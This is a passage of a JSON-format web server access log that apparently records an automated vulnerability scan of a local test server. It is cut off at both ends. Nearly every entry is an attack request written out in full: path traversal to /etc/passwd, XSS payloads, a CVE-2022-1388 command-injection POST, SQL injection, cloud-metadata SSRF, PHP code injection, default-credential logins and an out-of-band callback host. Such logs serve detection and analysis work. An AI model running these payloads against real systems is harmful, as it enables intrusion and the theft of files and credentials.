HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /documentation/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/metadata/v1.json HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.365","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=my-chatbot&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?server=db&username=root&db=mysql&table=event%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.drone.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenario/admin/welcome.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /final/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_netrc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vr2conf/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zm/?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /services/pluginscript/..;/..;/..;/getFavicon?host=c9v8gc8smpv8b0ng0t00o4463u11waune.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cacti/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"297MFkMYrqSZAigezbMlF9rZfgI","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /search/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 